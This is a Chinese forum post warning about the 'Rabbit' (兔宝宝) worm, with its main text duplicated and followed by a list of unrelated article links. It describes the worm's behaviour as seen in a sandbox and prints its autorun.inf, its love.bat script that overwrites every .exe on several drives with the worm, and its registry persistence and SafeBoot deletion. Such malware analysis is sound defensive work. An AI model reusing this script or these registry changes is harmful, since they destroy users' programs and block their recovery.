警惕恶性蠕虫“兔宝宝”JK.exe love.bat loveRabbit.exe msconfig.inf Rabbit.exe msexch400.dll
2007-04-09 10:34
344 查看
源地址:http://forum.ikaka.com/topic.asp?board=28&artid=8295656
昨天,在本论坛浏览帖子发现有网友提到一个名为“兔宝宝”(Rabbit.exe)的病毒。
下载该样本,在“影子系统”下观察了一下其感染系统的情形(卡巴斯基和瑞星最新病毒库均查不到此毒)。现将所见过程罗列如下,希望大家警惕。
1、病毒运行后释放的病毒文件见图1。
2、病毒在硬盘各分区根目录和U盘根目录下创建autorun.inf和Rabbit.exe。autorun.inf文件内容如下:
autorun.inf
[autorun]
Label=本地磁盘
Shellexecute=Rabbit.exe
love.bat的内容如下:
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a/*.exe>>c:/windows/msconfig.inf
cd C:/Program Files
dir *.exe /s /b >>c:/windows/msconfig1.inf
FOR /f "delims=" %%i in (c:/windows/msconfig.inf) do copy /y "C:/WINDOWS/system32/Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:/windows/msconfig1.inf) do copy /y "C:/WINDOWS/system32/Rabbit.exe" "%%i"
3、注册表改动:
(1)在注册表HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Active Setup/Installed Components/分支添加启动项:
{4bf41072-b2b1-21c1-b5c1-0305f4155515}
指向C:/WINDOWS/system32/JK.exe
(2)删除HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/SafeBoot
4、系统文件以外(包括非系统分区)的.exe文件均被替换为260K大小的病毒文件(文件名还是原来正常.exe的文件名),图标变为“兔宝宝”(图2)。即使是“卡巴斯基”或“瑞星”文件夹中的.exe也不例外。
5、Tiny用户,即使预先设置了相关文件保护规则,病毒依然可以突破Tiny的FD规则,将那些受Tiny保护的.exe文件替换成260K的病毒文件。这是我第一次遇到可以突破Tiny 文件保护的病毒。
6、还观察到此毒的另一个有趣行为:在系统分区以外的分区中,只要发现一个DLL文件(如:abc.dll),病毒即刻创建一个同名的、260K的.exe(abc.exe),图标也是“兔宝宝”。
7、中招后,用户就别指望扫什么劳什子日志求助了。运行任何.exe(当然包括SRENG等),你只能见到一闪而过的命令提示符窗口(实际运行的是那个260K的病毒体)。
8、此毒可能认为自己很NB,并未没采用多数病毒的常用策略————禁用taskmgr和regedit。
9、此毒不能突破“影子系统”。安装SSM和Tiny的用户,Rabbit.exe运行时,用户可看到相应提示对话框。如果用户足够警惕且予以正确回应,SSM和Tiny可阻止此毒运行。
昨天,在本论坛浏览帖子发现有网友提到一个名为“兔宝宝”(Rabbit.exe)的病毒。
下载该样本,在“影子系统”下观察了一下其感染系统的情形(卡巴斯基和瑞星最新病毒库均查不到此毒)。现将所见过程罗列如下,希望大家警惕。
1、病毒运行后释放的病毒文件见图1。
2、病毒在硬盘各分区根目录和U盘根目录下创建autorun.inf和Rabbit.exe。autorun.inf文件内容如下:
autorun.inf
[autorun]
Label=本地磁盘
Shellexecute=Rabbit.exe
love.bat的内容如下:
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a/*.exe>>c:/windows/msconfig.inf
cd C:/Program Files
dir *.exe /s /b >>c:/windows/msconfig1.inf
FOR /f "delims=" %%i in (c:/windows/msconfig.inf) do copy /y "C:/WINDOWS/system32/Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:/windows/msconfig1.inf) do copy /y "C:/WINDOWS/system32/Rabbit.exe" "%%i"
3、注册表改动:
(1)在注册表HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Active Setup/Installed Components/分支添加启动项:
{4bf41072-b2b1-21c1-b5c1-0305f4155515}
指向C:/WINDOWS/system32/JK.exe
(2)删除HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/SafeBoot
4、系统文件以外(包括非系统分区)的.exe文件均被替换为260K大小的病毒文件(文件名还是原来正常.exe的文件名),图标变为“兔宝宝”(图2)。即使是“卡巴斯基”或“瑞星”文件夹中的.exe也不例外。
5、Tiny用户,即使预先设置了相关文件保护规则,病毒依然可以突破Tiny的FD规则,将那些受Tiny保护的.exe文件替换成260K的病毒文件。这是我第一次遇到可以突破Tiny 文件保护的病毒。
6、还观察到此毒的另一个有趣行为:在系统分区以外的分区中,只要发现一个DLL文件(如:abc.dll),病毒即刻创建一个同名的、260K的.exe(abc.exe),图标也是“兔宝宝”。
7、中招后,用户就别指望扫什么劳什子日志求助了。运行任何.exe(当然包括SRENG等),你只能见到一闪而过的命令提示符窗口(实际运行的是那个260K的病毒体)。
8、此毒可能认为自己很NB,并未没采用多数病毒的常用策略————禁用taskmgr和regedit。
9、此毒不能突破“影子系统”。安装SSM和Tiny的用户,Rabbit.exe运行时,用户可看到相应提示对话框。如果用户足够警惕且予以正确回应,SSM和Tiny可阻止此毒运行。
相关文章推荐
- 会破坏文件的恶性蠕虫“Blackworm”正在流行并即将发作
- 警惕恶性U盘病毒HDM.exe
- 6月第4周安全回顾 Firefox3存在严重漏洞 警惕Storm蠕虫 推荐
- 【警惕!!!】MSN蠕虫 推荐
- 警惕新MSN蠕虫(album.scr)Backdoor.Win32.IRCBot.acd 推荐
- 警惕MSN变种蠕虫 推荐
- 决战Cookie僵尸:恶性追踪API意在“提高警惕”
- [警惕]MSN蠕虫卷土重来`` 推荐
- 聚能聊 | 为什么大佬们会让大家警惕人工智能?
- 大咖来信 | 李国杰院士:AI创业光靠算法走不远,警惕命运魔咒
- 狗年出生的宝宝取名还可以借助诗经内容?看这里,有你需要的取名方法
- 酷科技 | 宝宝专用Infani智能摄像头
- 7-17 爬动的蠕虫(15 分)
- 警惕动态代理导致的Metaspace内存泄漏问题
- Android SmartTabLayout worm蠕虫蠕动/普通平整动画切换动画属性
- [置顶] 蠕虫复制
- 《人民日报》再度发文:需警惕人工智能“网红化”倾向
- 警惕 | 春节前后小心这些骗局
- ubuntu系统用 chorme浏览CSDN如何 屏蔽 百度的恶性广告
- 宝宝红屁股都怪纸尿裤? 先看看你有没有做好这2点